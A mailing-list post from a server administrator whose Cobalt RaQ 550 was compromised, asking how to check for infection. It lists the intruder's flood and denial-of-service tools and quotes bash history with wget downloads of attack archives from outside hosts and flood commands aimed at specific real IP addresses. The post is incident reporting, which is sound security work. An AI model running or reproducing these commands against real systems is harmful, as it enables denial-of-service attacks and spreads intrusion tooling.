Hello, this weekend it looks like a raq 550 of mine whas hacked. i tracked some processes that was flooding. the program was called vladimII
it was runned on the name of a user that had ssh access. when i blocked this user it started a day later with a nother user. this 2 users are from different sites on the same machine. But these 2 users are fronm the same person. tracking the ip's i came out in Washington but the user is dutch so it looks like someone hacked his computer to retreive his passwords ? Is there a way to look if the raq is infected or that blokking this user to ssh will be enough the program was russing whas in the /home/tmp dir in the map flood, a list is below. the file broadcast.txt has 2102 ip's in it. i also have saved the bash history of the 2 users. there are several programs that was downloaded to my server. i shorted the bash to the progroms that was downloaded below this mail please advice ---------- -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8 -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2 -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3 -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2 -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3 -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5 -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6 -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2 -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7 -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2 -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock ----- bash history wget www.ps-lov.us/pizda.tgz wget snow.prohosting.com/muiemuie/p.tar.gz wget snow.prohosting.com/muiemuie/p.tgz wget snow.prohosting.com/muiemuie/km3.tgz wget 65.113.119.133/muiemuie/km3.tgz its runns programs like ./super 69.65.48.23 53 nasa.gov ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0 ./cw 210.0.204.185 ./stealth 210.0.204.185 6500000000000 ./super 64.207.19.6 53 nasa.gov _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
